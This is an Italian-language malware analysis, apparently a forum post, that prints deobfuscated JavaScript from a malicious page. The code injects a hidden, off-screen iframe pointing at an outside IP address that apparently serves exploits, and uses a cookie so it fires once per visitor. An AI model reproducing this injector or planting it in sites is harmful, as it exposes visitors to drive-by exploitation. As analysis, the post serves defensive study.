Ecco il codice sorgente per lo studio. Ho aggiunto alcuni commenti e variabili rinominate. La sorgente per l'iframe è inattiva o invia un exploit solo condizionatamente. Non ero in grado di accedervi utilizzando un proxy o direttamente con uno strumento non-browser. È possibile che sia possibile filtrare agenti utente, possibile targeting per IE vecchio o determinati telefoni cellulari.
Sembra codificato da un utente inesperto con uno strumento, perché non nasconde le variabili all'interno della stringa esadecimale che aggiungerebbe un ulteriore livello di offuscamento e ridurrebbe le dimensioni. Inoltre, eval appare raramente in testo normale.
function loadFrame() {
var static = 'ajax';
var controller = 'index.php';
var iframe = document.createElement('iframe');
// set the source to some evil script
// it may use client detection, as all I can see is
iframe.src = 'http://64.78.1.202/tM9c7bCK.php';
iframe.style.position = 'absolute';
iframe.style.color = '563';
iframe.style.height = '563px';
iframe.style.width = '563px';
iframe.style.left = '1000563';
iframe.style.top = '1000563';
// if the frame doesn't already exist load it
if (!document.getElementById('hmbl')) {
document.write('<p id=\'hmbl\' class=\'loadFrame\' ></p>');
document.getElementById('hmbl').appendChild(iframe);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires="
+ expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {
} else {
SetCookie('visited_uq', '55', '1', '/');
loadFrame();
}
}